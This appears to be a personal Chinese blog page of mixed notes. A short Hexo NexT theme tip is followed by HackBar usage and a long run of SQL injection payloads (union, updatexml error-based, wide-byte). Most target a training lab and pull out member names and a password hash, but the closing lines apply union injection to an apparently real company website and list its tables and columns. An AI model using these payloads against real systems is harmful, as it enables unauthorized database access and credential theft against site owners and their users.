友链
基于next主题下如何添加友链以及修改左侧任务栏和菜单栏的图标、文字的颜色.
E:\BOKE\hexo_blog\source\links\index.md
1 | <div class="card"> |
E:\BOKE\hexo_blog\themes\next\source\css\_variables\base.styl
菜单栏以及侧边任务栏修改颜色
markdown语法的文档
https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet
官网可实行在线编辑
SQL hacker bar使用
- Load URL:复制网址
- Split URL:剪切地址
- Encyption:四种加密方式
- Encoding:三种编码方式
- SQL:一些方便查询的语句
- 1 eg:字段数是10的时候,我们需要手动打出and 1=2 unionselect1,2,3,4,5,6,7,8,9,10,这样做会很麻烦。我们通过hackbar的SQL选项里面的union select statement在其中输入字段数,hackbar会自动的帮助我们输入那一大串文字
- xss:XSS攻击
- Post data:以post的方式提交数据
简单的CTF登录题目可以尝试 ‘or 1=1 #
and(有假则假 1表示真,0表示假)
1 and 1 = 1
1 and 0 = 0
0 and 0 = 0
or(有真则真 1表示真,0表示假)
1 or 1 = 1
1 or 0 =1
0 or 0 =0
xor(异或,相同为0,相异为1,0和其他任意不为0值进行异或结果都为1,除了0之外的其他相异的数进行异或结果都为0)
1 xor 1 =0
0 xor 1 =1
0 xor 0 =0
8 xor 7 =0
0 xor 7 =1
截取函数:
left(‘admin’,1):左截取,从左边截取admin字符串,截取一位。
right(’admin’,1):右截取
mid(’admin’,1,2):截取admin字符串,从第一位开始截取,截取两位
substr(’admin’,1,1):
substring(’admin’,1,1):
判断函数:
if(1=1,1,0):
case when 1=1 then 0 else 1 end:
当前数据库:mozhe_discuz_stormgroup
information_schema
表名:notice(id,title,content,time),stormgroup_member(id,name,password,status)
‘ union select 1,2,3,4–+
‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=’mozhe_discuz_stormgroup’–+
‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=’stormgroup_member’–+
‘ union select 1,name,password,4 from stormgroup_member–+
‘and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’member’ limit 0,1),0x7e),1)=’1–+
name password status
‘and updatexml(1,concat(0x7e,(select status from member limit 0,1),0x7e),1)=’1–+ 0 1
‘and updatexml(1,concat(0x7e,(select name from member limit 1,1),0x7e),1)=’1–+ mozhe
‘and updatexml(1,concat(0x7e,(select password from member limit 1,1),0x7e),1)=’1–+ ~10d4fd8b49ca62d2d43e561965e81ce
截取31位后面的密码
right(select group_concat(password) from member),4)
‘ and updatexml(1,concat(0x7e,(right((select group_concat(password) from member),4)),0x7e),1)=’1–+ ‘1ce8‘
‘ and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 0,1),0x7e),1)–+
‘ and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 1,1),0x7e),1)–+
宽字节注入 1%df’ ……… –+
1%df’and updatexml(1,concat(0x7e,database(),0x7e),1)–+ ‘mozhe_discuz_stormgroup‘ 库
1%df’and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1)–+
XPATH syntax error: ‘notice,stormgroup_member‘
73746f726d67726f75705f6d656d626572
1%df’and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572),0x7e),1)–+
XPATH syntax error: ‘name,password,status‘
6e616d65 70617373776f7264 737461747573
1%df’and updatexml(1,concat(0x7e,(select group_concat(status) from information_schema.columns where table_name=0x737461747573),limit 0,1)0x7e),1)–+
1%df’and updatexml(1,concat(0x7e,right((select group_concat(password) from stormgroup_member ),1),0x7e),1)–+
XPATH syntax error: ‘c‘
order br 5
union select 1,2,database(),version()
表明 pentesterlab
sleep()==>反应时间
http://www.shouyaoholding.com/new_details.php?id=1%20order%20by%2013--+
库 shouyao
表 banner,busniess_user,company,contact,innovation,news,recruit,reports,resources,resume,resume_copy1
列 resources(id,type,title,thumb,desc,desc2,add_time,detail,status,top)
group_concat(column_name) information_schema.columns where table_name=’resources’
http://www.shouyaoholding.com/new_details.php?id=-1%20union%20select%201,2,database(),4,5,6,group_concat(column_name),8,9,10,11,12,13%20%20from%20information_schema.columns where table_name=’resources’–+
http://www.shouyaoholding.com/new_details.php?id=-1%20union%20select%201,2,(select group_concat(id) from resources),4,5,6,group_concat(column_name),8,9,10,11,12,13%20%20from%20information_schema.columns where table_name=’resources’–+